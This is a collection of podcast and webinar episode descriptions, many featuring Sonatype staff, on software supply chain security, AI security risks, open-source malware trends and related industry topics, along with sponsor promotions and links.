ArmorCode unveils Anya—the first agentic AI virtual security champion designed specifically for AppSec and product security teams. Anya brings together conversation and context to help AppSec, developers and security teams cut through the noise, prioritize risks, and make faster, smarter decisions across code, cloud, and infrastructure. Built into the ArmorCode ASPM Platform and backed by 25B findings, 285+ integrations, natural language intelligence, and role-aware insights, Anya turns complexity into clarity, helping teams scale securely and close the security skills gap. Anya is now generally available and included as part of the ArmorCode ASPM Platform. Visit https://securityweekly.com/armorcodersac to request a demo! As 'vibe coding", the practice of using AI tools with specialized coding LLMs to develop software, is making waves, what are the implications for security teams? How can this new way of developing applications be made secure? Or have the horses already left the stable? Segment Resources: https://www.backslash.security/press-releases/backslash-security-reveals-in-new-research-that-gpt-4-1-other-popular-llms-generate-insecure-code-unless-explicitly-prompted https://www.backslash.security/blog/vibe-securing-4-1-pillars-of-appsec-for-vibe-coding This segment is sponsored by Backslash. Visit https://securityweekly.com/backslashrsac to learn more about them! The rise of AI has largely mirrored the early days of open source software. With rapid adoption amongst developers who are trying to do more with less time, unmanaged open source AI presents serious risks to organizations. Brian Fox, CTO & Co-founder of Sonatype, will dive into the risks associated with open source AI and best practices to secure it. Segment Resources: https://www.sonatype.com/solutions/open-source-ai https://www.sonatype.com/blog/beyond-open-vs.-closed-understanding-the-spectrum-of-ai-transparency https://www.sonatype.com/resources/whitepapers/modern-development-in-ai-era This segment is sponsored by Sonatype. Visit https://securityweekly.com/sonatypersac to learn more about Sonatype's AI SCA solutions! The surge in AI agents is creating a vast new cyber attack surface with Non-Human Identities (NHIs) becoming a prime target. This segment will explore how SandboxAQ's AQtive Guard Discover platform addresses this challenge by providing real-time vulnerability detection and mitigation for NHIs and cryptographic assets. We'll discuss the platform's AI-driven approach to inventory, threat detection, and automated remediation, and its crucial role in helping enterprises secure their AI-driven future. To take control of your NHI security and proactively address the escalating threats posed by AI agents, visit https://securityweekly.com/sandboxaqrsac to schedule an early deployment and risk assessment. Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw-332

ArmorCode unveils Anya—the first agentic AI virtual security champion designed specifically for AppSec and product security teams. Anya brings together conversation and context to help AppSec, developers and security teams cut through the noise, prioritize risks, and make faster, smarter decisions across code, cloud, and infrastructure. Built into the ArmorCode ASPM Platform and backed by 25B findings, 285+ integrations, natural language intelligence, and role-aware insights, Anya turns complexity into clarity, helping teams scale securely and close the security skills gap. Anya is now generally available and included as part of the ArmorCode ASPM Platform. Visit https://securityweekly.com/armorcodersac to request a demo! As 'vibe coding", the practice of using AI tools with specialized coding LLMs to develop software, is making waves, what are the implications for security teams? How can this new way of developing applications be made secure? Or have the horses already left the stable? Segment Resources: https://www.backslash.security/press-releases/backslash-security-reveals-in-new-research-that-gpt-4-1-other-popular-llms-generate-insecure-code-unless-explicitly-prompted https://www.backslash.security/blog/vibe-securing-4-1-pillars-of-appsec-for-vibe-coding This segment is sponsored by Backslash. Visit https://securityweekly.com/backslashrsac to learn more about them! The rise of AI has largely mirrored the early days of open source software. With rapid adoption amongst developers who are trying to do more with less time, unmanaged open source AI presents serious risks to organizations. Brian Fox, CTO & Co-founder of Sonatype, will dive into the risks associated with open source AI and best practices to secure it. Segment Resources: https://www.sonatype.com/solutions/open-source-ai https://www.sonatype.com/blog/beyond-open-vs.-closed-understanding-the-spectrum-of-ai-transparency https://www.sonatype.com/resources/whitepapers/modern-development-in-ai-era This segment is sponsored by Sonatype. Visit https://securityweekly.com/sonatypersac to learn more about Sonatype's AI SCA solutions! The surge in AI agents is creating a vast new cyber attack surface with Non-Human Identities (NHIs) becoming a prime target. This segment will explore how SandboxAQ's AQtive Guard Discover platform addresses this challenge by providing real-time vulnerability detection and mitigation for NHIs and cryptographic assets. We'll discuss the platform's AI-driven approach to inventory, threat detection, and automated remediation, and its crucial role in helping enterprises secure their AI-driven future. To take control of your NHI security and proactively address the escalating threats posed by AI agents, visit https://securityweekly.com/sandboxaqrsac to schedule an early deployment and risk assessment. Show Notes: https://securityweekly.com/asw-332

In this episode of the FINOS Open Source in Finance webinar series, Karl Moll hosts an engaging panel discussion with Tyler Warden from Sonatype and Aaron Erickson from Nvidia. The topic is 'The Unexpected Risks of AI in Finance,' covering hidden and novel security risks in AI-driven financial systems, the importance of hardware in AI security, and regulatory approaches to AI compliance. The panelists delve into common misconceptions, real-world examples of AI risks, software supply chain issues, and actionable advice for securing AI pipelines. They also discuss the fundamental role of human accountability and the importance of collaboration between security and engineering teams.00:00 Welcome and Introduction03:40 Panelist Introductions05:43 Common Misconceptions in AI Security08:37 Hidden Risks of AI in Finance16:52 Regulatory Approaches to AI Risks23:54 Advice for Compliance Teams30:56 The Importance of Fundamentals in AI31:37 AI's Role in Speeding Up Reaction Times32:56 Building Security into AI Pipelines36:02 Operational Collaboration for AI Security43:07 Designing User-Centric AI Systems48:40 Rapid Fire Q&A on AI Security55:23 Final Thoughts and RecommendationsFind more info about FINOS:On the web: https://www.finos.org Open Source in Finance Forum (OSFF Conference): https://www.finos.org/osff-2025 2024 State of Open Source in Financial Services Download: ⁠https://www.finos.org/state-of-open-source-in-financial-services-2024⁠ FINOS Current Newsletter Here: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.finos.org/newsletterLinkedIn: https://www.linkedin.com/company/finosfoundation Twitter: https://twitter.com/FINOSFoundation About FINOSFINOS (The Fintech Open Source Foundation) is a nonprofit whose mission is to foster the adoption of open source, open standards, and collaborative software development practices in financial services. It is the center for open source developers and the financial services industry to build new technology projects that have a lasting impact on business operations. As a regulatory compliant platform, the foundation enables developers from these competing organizations to collaborate on projects with a strong propensity for mutualization. It has enabled codebase contributions from both the buy- and sell-side firms and counts over 50 major financial institutions, fintechs and technology consultancies as part of its membership. FINOS is also part of the Linux Foundation, the largest shared technology organization in the world. Get involved and join FINOS as a Member.

Eddie Knight, OSPO lead at Sonatype, discusses how the EU Cyber Resilience Act can help with improving your software project's security and in the same time to slow down the alarming acceleration of software supply chain attacks. Read a transcript of this interview: https://bit.ly/3RDMPVX Subscribe to the Software Architects' Newsletter for your monthly guide to the essential news and experience from industry peers on emerging patterns and technologies: https://www.infoq.com/software-architects-newsletter Upcoming Events: InfoQ Dev Summit Boston (June 9-10, 2025) Actionable insights on today's critical dev priorities. devsummit.infoq.com/conference/boston2025 InfoQ Dev Summit Munich (October 15-16, 2025) Essential insights on critical software development priorities. https://devsummit.infoq.com/conference/munich2025 QCon San Francisco 2025 (November 17-21, 2025) Get practical inspiration and best practices on emerging software trends directly from senior software developers at early adopter companies. https://qconsf.com/ QCon AI NYC 2025 (December 16-17, 2025) https://ai.qconferences.com/ The InfoQ Podcasts: Weekly inspiration to drive innovation and build great teams from senior software leaders. Listen to all our podcasts and read interview transcripts: - The InfoQ Podcast https://www.infoq.com/podcasts/ - Engineering Culture Podcast by InfoQ https://www.infoq.com/podcasts/#engineering_culture - Generally AI: https://www.infoq.com/generally-ai-podcast/ Follow InfoQ: - Mastodon: https://techhub.social/@infoq - Twitter: twitter.com/InfoQ - LinkedIn: www.linkedin.com/company/infoq - Facebook: bit.ly/2jmlyG8 - Instagram: @infoqdotcom - Youtube: www.youtube.com/infoq Write for InfoQ: Learn and share the changes and innovations in professional software development. - Join a community of experts. - Increase your visibility. - Grow your career. https://www.infoq.com/write-for-infoq

Send us a textGet up to speed with everything that mattered in cybersecurity this month. In this episode of The Cyberman Show, we break down March 2025's top cyber incidents, threat actor tactics, security product launches, and vulnerabilities actively exploited in the wild.Here's what we cover:

In this episode, Dave sits down with Megan Lueders (CMO at Sonatype), Ido Mart (CMO at ManyChat), and Kimberly Storin (CMO at Zayo) for a live CMO panel discussion at Exit Five's Austin marketing meetup. These marketing leaders share what's working what's not in B2B marketing today and how the role of the CMO is evolving.Dave, Megan, Ido, and Kimberly cover:What every new CMO needs to know about leading a marketing orgHow to align with CEOs, CFOs, and key stakeholders to drive business impactThe biggest marketing shifts happening right now (and what's no longer working)How to prove marketing's impact in the era of efficiencyTimestamps(00:00) - – Introduction to the CMO panel (03:31) - – The evolving role of the CMO in 2025 (06:57) - – The biggest challenges marketing leaders face today (10:04) - – How to align marketing with CEOs, CFOs, and key stakeholders (13:39) - – What every new CMO needs to know when stepping into the role (17:14) - – The marketing strategies that are working right now (and what's not) (21:01) - – Why B2B marketing is more emotional than most people realize (25:45) - – How to prove marketing's impact in a data-driven, efficiency-focused era (29:27) - – The shift from demand gen to brand-led growth (32:52) - – The role of storytelling and positioning in B2B marketing success (37:07) - – Building a high-performing marketing team and the skills CMOs need today (40:47) - – Key takeaways and final advice for marketing leaders Send guest pitches and ideas to hi@exitfive.comJoin the Exit Five Newsletter here: https://www.exitfive.com/newsletterCheck out the Exit Five job board: https://jobs.exitfive.com/Become an Exit Five member: https://community.exitfive.com/checkout/exit-five-membership***Today's episode is brought to you by Customer.io.You know that feeling when you open your inbox, and it's just… noise? Bad marketing. Spam. Most companies are out here just talking at customers, not talking to them.Marketing messages should do more than just land in an inbox – they should create impact and drive real engagement.Customer.io helps companies send smarter, more personalized messages using first-party data. Their platform enables brands to reach customers at the right time, in the right place, on the right channel—whether that's email, SMS, push notifications, or beyond.And the best part is that it's all automated, so you're not just blasting campaigns and hoping for the best. You're running a machine that delivers real, human engagement at scale.7,000+ brands already trust Customer.io to make their marketing feel less like noise and more like connection. Join them by visiting Customer.io to get started. ***Thanks to my friends at hatch.fm for producing this episode and handling all of the Exit Five podcast production.They give you unlimited podcast editing and strategy for your B2B podcast.Get unlimited podcast editing and on-demand strategy for one low monthly cost. Just upload your episode, and they take care of the rest.Visit hatch.fm to learn more

Brian Fox discusses findings from a recent Sonatype report about the growing challenge of malicious packages in open source repositories. At the time of recording there are now over 820,000 malware packages in public repositories. Brian explains why certain ecosystems are more vulnerable than others and how behavioral detection methods can identify suspicious packages, and the challenge in solving this problem. The blog post for this episode can be found at https://opensourcesecurity.io/2025/2025-03-oss_malware_brian_fox/

In this episode, David Rubinstein interviews Brian Fox, co-founder and CTO of Sonatype. They discuss the company's 10th annual State of the Software Supply Chain report. Key talking points include: The rapid growth of malicious open-source componentsThe increasing length of time needed to remediate vulnerabilitiesHow regulations impact supply chain securityNote: This will be the final episode of What The Dev released in 2024. We'll be back in early January 2025! 

Josh and Kurt talk to Brian Fox from Sonatype and Donald Fischer from Tidelift about their recent reports as well as open source. There are really interesting connections between the two reports. The overall theme seems to be open source is huge, everywhere, and needs help. But all is no lost! There's some great ideas on what the future needs to look like. Show Notes Donald Fischer Brian Fox Tidelift Sonatype The 2024 Tidelift state of the open source maintainer report Sonatype State of the Software Supply Chain Anchore 2024 Software Supply Chain Security Report OpenSSF TAC issue 101

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss the top 3 tips for reducing software supply chain risk. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss software transparency. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

Join us this week on the AWS Developers podcast as we dive deep into CodeArtifact, AWS's fully managed artifact repository service. In this insightful discussion with the team behind CodeArtifact, we explore what makes this service essential for developers. Discover the myriad benefits it offers in terms of availability, security, and cost-efficiency. Did you know that 83% of Maven's public server bandwidth is consumed by just 1% of its client IP addresses? Utilizing a private artifact repository like CodeArtifact not only optimizes your workflows but also contributes to a more sustainable internet infrastructure. We'll also share expert insights and best practices for deploying CodeArtifact at scale, ensuring you get the most out of this powerful service. Tune in to enhance your development process and learn how to be a responsible internet citizen. With Carl Lewis and Derek Tam, Software Development Manager, AWS Links - AWS CodeArtifact https://docs.aws.amazon.com/codeartifact/latest/ug/welcome.html - Recent blog posts I wrote about CodeArtifact https://aws.amazon.com/blogs/aws/category/developer-tools/aws-code-artifact/ - 83% of maven servers bandwidth is consumed by 1% of its client IP addresses, the Sonatype blog post. https://www.sonatype.com/blog/maven-central-and-the-tragedy-of-the-commons - Carl Lewis on Linked In https://www.linkedin.com/in/carlglewis/ - Derek Tam on Linked In https://www.linkedin.com/in/derek-tam-3548987/

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss what CISOs and security teams should look for when buying IoT or OT products. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss what CISOs and security teams should look for when buying cloud products. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

In this episode of the podcast, Grizz and Eddie Knight of Sonatype return to our FINOS Debrief episodes that wrap up the past month or so in the FINOS Ecosystem - and look forward to the next month and beyond. Attend the London Open Source in Finance Forum 26 June 2024: ⁠⁠https://events.linuxfoundation.org/open-source-finance-forum-london/⁠⁠ 2023 State of Open Source in Financial Services Download: ⁠⁠⁠https://www.finos.org/state-of-open-source-in-financial-services-2023⁠⁠⁠ FINOS Current Newsletter Here: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.finos.org/newsletter⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ - more show notes to come Eddie's Info | ⁠https://www.linkedin.com/in/knight1776/ Grizz's Info | ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.linkedin.com/in/aarongriswold/⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ | ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠grizz@finos.org⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ ►► ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠Visit FINOS www.finos.org⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ ►► ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠Get In Touch: info@finos.org⁠

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss who is vulnerable to software supply chain attacks. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss whether open source code is a risk. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss software supply chain security risk, and how development teams can reduce it. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss challenges in achieving secure-by-design or secure-by-default products. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss important aspects of a secure development lifecycle. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss how organizations can implement software supply chain security. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss software supply chain security regulations, including whether there are any laws or standards in the industry. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

Brian Fox, co-founder and CTO at Sonatype, joins host Steve Morgan to discuss software supply chain management and security. They also delve into the founding of Sonatype, the company's operations, and other related topics. Sonatype is a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

Cassie Crossley, author of the book “Software Supply Chain Security: Securing the End-to-end Supply Chain for Software, Firmware, and Hardware,” is the VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric. In this episode, she joins host Steve Morgan to discuss software supply chain security, including what it is and why it's important. Supply Chain Q&A is sponsored by Sonatype, a leader in enterprise software supply chain management. To learn more about our sponsor, visit https://sonatype.com.

In this supper club episode of Syntax, Wes and Scott talk with Darcy Clarke about his career path in tech, working with Wes back in the day, why he decided to build vlt volt, and the biggest sick pick list yet! Show Notes 00:32 Welcome 01:38 Building a tweet wall back in the day 08:54 How did you land at npm? npm 19:40 Why do we need another package manager and registry? 22:11 What is vlt volt? vlt: a new home for open source vlt /vōlt/ (@vltpkg) / X Shipping ESM with Mark Erikson Bun Yarn Nx 27:18 Do you see a future where we don't pre-compile before shipping? 29:32 Why would pnpm be faster than npm? 31:14 What are the problems with symlinking? 33:08 What's happening with Yarn? Verdaccio Cloudsmith jfrong Sonatype socket.dev Snyk.io Dependency Confusion 37:42 What do you think about config files? antfu Config of File Nesting for VS Code The massive bug at the heart of the npm ecosystem WebTorrent 41:02 VS Code tip - file nesting patterns 41:59 How does on-prem registry work? 47:29 Where does Socket.dev and Snyk security fit? 52:46 Sick Picks 04:41 How did you get vlt.sh? 05:30 How did you get @Darcy? Sick Picks Flat Coat Goldendoodle Scientific American Nespresso BlackBerry (2023) - IMDb BlackBerry (2023) Letterboxd Matthias Wandel Blink-182 Official Site Moneen Bring Me The Horizon Shameless Plugs vlt: a new home for open source Hit us up on Socials! Syntax: X Instagram Tiktok LinkedIn Threads Wes: X Instagram Tiktok LinkedIn Threads Scott: X Instagram Tiktok LinkedIn Threads

In this episode of the podcast, Grizz sits down with Cortney Stauffer (Head of UX Practice) & Chuck Danielsson (Head of Practice, Web/UI), both from Adaptive. They talk about UX, UI, FDC3, and why things should just work. Cortney Stauffer: https://www.linkedin.com/in/cortstauffer/ Chuck Danielsson: https://www.linkedin.com/in/chuck-danielsson-2141b058/ NYC November 1 - Open Source in Finance Forum: ⁠⁠⁠⁠⁠⁠⁠⁠⁠https://events.linuxfoundation.org/open-source-finance-forum-new-york/⁠⁠⁠⁠⁠⁠⁠⁠⁠ 2022 State of Open Source in Financial Services Download: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.finos.org/state-of-open-source-in-financial-services-2022⁠⁠⁠⁠⁠⁠⁠⁠⁠ All Links on Current Newsletter Here: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.finos.org/newsletter⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ - more show notes to come A huge thank you to all our sponsors for Open Source in Finance Forum New York ⁠⁠⁠⁠⁠⁠⁠⁠https://events.linuxfoundation.org/open-source-finance-forum-new-york/⁠⁠⁠⁠⁠⁠⁠⁠that will take place this November 1st at the New York Marriott Marquis This event wouldn't be possible without our sponsors. A special thank you to our Leader sponsors: Databricks, where you can unify all your data, analytics, and AI on one platform. And Red Hat - Open to change—yesterday, today, and tomorrow. And our Contributor and Community sponsors: Adaptive/Aeron, Connectifi, Discover, Enterprise DB, FinOps Foundation, Fujitsu, instaclustr, Major League Hacking, mend.io, Open Mainframe Project, OpenJS Foundation, OpenLogic by Perforce, Orkes, Percona, Sonatype, StormForge, and Tidelift. If you would like to sponsor or learn more about this event, please send an email to ⁠⁠⁠⁠⁠⁠⁠⁠sponsorships@linuxfoundation.org⁠⁠⁠⁠⁠⁠⁠⁠. Grizz's Info | ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.linkedin.com/in/aarongriswold/⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ | ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠grizz@finos.org⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ ►► ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠Visit FINOS www.finos.org⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ ►► ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠Get In Touch: info@finos.org⁠

In this episode of the podcast, Grizz sits down with Jon Gottfried, Co-Founder of Major League Hacking. They talk about hackathons in finance, and developer/engineering talent, from both the individual and hiring manager perspectives. Jon Gottfried: https://www.linkedin.com/in/jonmarkgo/ MajorLeagueHacking: https://sponsor.mlh.io/ NYC November 1 - Open Source in Finance Forum: ⁠⁠⁠⁠⁠⁠⁠⁠https://events.linuxfoundation.org/open-source-finance-forum-new-york/⁠⁠⁠⁠⁠⁠⁠⁠ 2022 State of Open Source in Financial Services Download: ⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.finos.org/state-of-open-source-in-financial-services-2022⁠⁠⁠⁠⁠⁠⁠⁠ All Links on Current Newsletter Here: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.finos.org/newsletter⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ - more show notes to come A huge thank you to all our sponsors for Open Source in Finance Forum New York ⁠⁠⁠⁠⁠⁠⁠https://events.linuxfoundation.org/open-source-finance-forum-new-york/⁠⁠⁠⁠⁠⁠⁠that will take place this November 1st at the New York Marriott Marquis This event wouldn't be possible without our sponsors. A special thank you to our Leader sponsors: Databricks, where you can unify all your data, analytics, and AI on one platform. And Red Hat - Open to change—yesterday, today, and tomorrow. And our Contributor and Community sponsors: Adaptive/Aeron, Connectifi, Discover, Enterprise DB, FinOps Foundation, Fujitsu, instaclustr, Major League Hacking, mend.io, Open Mainframe Project, OpenJS Foundation, OpenLogic by Perforce, Orkes, Percona, Sonatype, StormForge, and Tidelift. If you would like to sponsor or learn more about this event, please send an email to ⁠⁠⁠⁠⁠⁠⁠sponsorships@linuxfoundation.org⁠⁠⁠⁠⁠⁠⁠. Grizz's Info | ⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.linkedin.com/in/aarongriswold/⁠⁠⁠⁠⁠⁠⁠⁠⁠ | ⁠⁠⁠⁠⁠⁠⁠⁠⁠grizz@finos.org⁠⁠⁠⁠⁠⁠⁠⁠⁠ ►► ⁠⁠⁠⁠⁠⁠⁠⁠⁠Visit FINOS www.finos.org⁠⁠⁠⁠⁠⁠⁠⁠⁠ ►► ⁠⁠⁠⁠⁠⁠⁠⁠⁠Get In Touch: info@finos.org

In this episode of the podcast, our FINOS COO, Jane Gavronsky sits down with Adrian Dale of ISLA and David Shone of ISDA to discuss the associations contribution and backing of the FINOS CDM, Common Domain Model to the FINOS open source community. CDM: https://cdm.finos.org/ On GitHub: https://github.com/finos/common-domain-model Adrian Dale, Head of Regulation & Markets, ISLA - https://www.linkedin.com/in/adrian-dale-27942314/ David Shone, Director of Product - Data & Digital, ISDA - https://www.linkedin.com/in/david-shone/ Jane Gavronsky, COO, FINOS - https://www.linkedin.com/in/janegavronsky/ NYC November 1 - Open Source in Finance Forum: ⁠⁠⁠⁠⁠⁠⁠https://events.linuxfoundation.org/open-source-finance-forum-new-york/⁠⁠⁠⁠⁠⁠⁠ 2022 State of Open Source in Financial Services Download: ⁠⁠⁠⁠⁠⁠⁠⁠https://www.finos.org/state-of-open-source-in-financial-services-2022⁠⁠⁠⁠⁠⁠⁠ All Links on Current Newsletter Here: ⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.finos.org/newsletter⁠⁠⁠⁠⁠⁠⁠⁠⁠ - more show notes to come A huge thank you to all our sponsors for Open Source in Finance Forum New York ⁠⁠⁠⁠⁠⁠https://events.linuxfoundation.org/open-source-finance-forum-new-york/⁠⁠⁠⁠⁠⁠that will take place this November 1st at the New York Marriott Marquis This event wouldn't be possible without our sponsors. A special thank you to our Leader sponsors: Databricks, where you can unify all your data, analytics, and AI on one platform. And Red Hat - Open to change—yesterday, today, and tomorrow. And our Contributor and Community sponsors: Adaptive/Aeron, Connectifi, Discover, Enterprise DB, FinOps Foundation, Fujitsu, instaclustr, Major League Hacking, mend.io, Open Mainframe Project, OpenJS Foundation, OpenLogic by Perforce, Orkes, Percona, Sonatype, StormForge, and Tidelift. If you would like to sponsor or learn more about this event, please send an email to ⁠⁠⁠⁠⁠⁠sponsorships@linuxfoundation.org⁠⁠⁠⁠⁠⁠. Grizz's Info | ⁠⁠⁠⁠⁠⁠⁠⁠https://www.linkedin.com/in/aarongriswold/⁠⁠⁠⁠⁠⁠⁠⁠ | ⁠⁠⁠⁠⁠⁠⁠⁠grizz@finos.org⁠⁠⁠⁠⁠⁠⁠⁠ ►► ⁠⁠⁠⁠⁠⁠⁠⁠Visit FINOS www.finos.org⁠⁠⁠⁠⁠⁠⁠⁠ ►► ⁠⁠⁠⁠⁠⁠⁠⁠Get In Touch: info@finos.org

Josh and Kurt talk about Sonatype's 9th Annual State of the Software Supply Chain. There's a ton of data in the report, but the thing we want to talk about is the statistic that only 11% of open source is actually being maintained. Do we think that's true? Does it really matter? Show Notes Sonatype report ecosyste.ms GNOME libcue flaw Reality 2.0 supply chain episode

We pick back up with Joshua Corman, founder of grass roots organization I Am the Cavalry, for part two of our discussion. Josh shares insights from his many years on the healthcare cyber front lines and provides both a captivating and sobering perspective on the state of healthcare security today. And while there have been many strides forward, we still have a long way to go. Audra and I learned so much during our discussion including themes such as cyber asbestos, the emerging care desert, dependency on undependable things, recalibrating the cost of connected medicine, if you can't protect it/can't connect it, the Omnibus Appropriations Act, and actionable insights on what we can do right now, as individuals and collectively, to make a difference.   Joshua Corman is the founder of I Am the Cavalry, a grassroots organization focused on the intersection of digital security, public safety, and human life. He was formerly chief strategist of CISA's COVID Task Force, where he advised on the pandemic response, provided cybersecurity expertise on healthcare infrastructure, and supported control systems and life safety initiatives. Prior to CISA, Josh was SVP and chief security officer at PTC, where he accelerated cyber safety maturity across industries. Previously, he served as director of the Atlantic Council's Cyber Statecraft Initiative, on the Congressional Task Force for Healthcare Industry Cybersecurity, and in leadership roles at Sonatype, Akamai, IBM, and the 451 Group. For links and resources discussed in this episode, please visit our show notes at https://www.forcepoint.com/govpodcast/e248

We had so much to talk about with this week's guest that we made it a two-part episode! Joining us this week, and next week, is Joshua Corman, founder of grass roots organization I Am the Cavalry. Josh shares insights from his many years on the healthcare cyber front lines and provides both a captivating and sobering perspective on the state of healthcare security today. And while there have been many strides forward, we still have a long way to go. Audra and I learned so much during our discussion including themes such as cyber asbestos, the emerging care desert, dependency on undependable things, recalibrating the cost of connected medicine, if you can't protect it/can't connect it, the Omnibus Appropriations Act, and actionable insights on what we can do right now, as individuals and collectively, to make a difference. Joshua Corman is the founder of I Am the Cavalry, a grassroots organization focused on the intersection of digital security, public safety, and human life. He was formerly chief strategist of CISA's COVID Task Force, where he advised on the pandemic response, provided cybersecurity expertise on healthcare infrastructure, and supported control systems and life safety initiatives. Prior to CISA, Josh was SVP and chief security officer at PTC, where he accelerated cyber safety maturity across industries. Previously, he served as director of the Atlantic Council's Cyber Statecraft Initiative, on the Congressional Task Force for Healthcare Industry Cybersecurity, and in leadership roles at Sonatype, Akamai, IBM, and the 451 Group. For links and resources discussed in this episode, please visit our show notes at https://www.forcepoint.com/govpodcast/e247